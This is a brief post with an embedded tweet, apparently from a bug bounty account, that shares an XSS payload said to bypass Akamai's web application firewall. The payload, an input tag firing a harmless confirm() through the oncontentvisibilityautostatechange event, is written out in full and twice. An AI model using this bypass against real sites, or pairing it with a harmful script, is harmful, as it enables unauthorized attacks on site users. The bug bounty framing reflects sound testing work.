A WAF bypass for Akamai was discovered that led to 30 XSS vulnerabilities in a large platform. The bypass payload used was '><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">'. This bypass exploited the oncontentvisibilityautostatechange attribute to trigger a confirmation dialog, bypassing Akamai's protections. This vulnerability highlights the importance of thorough WAF configurations and protections against XSS attacks. #BugBounty #WAF #XSS
WAF AKAMAI Bypass
Lead to 30 XSS in large BBP?"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">#BugBounty #Tips #Waf
????????? pic.twitter.com/qaD1HsMyqx— ??????? ???? (@HackingTeam777) September 16, 2024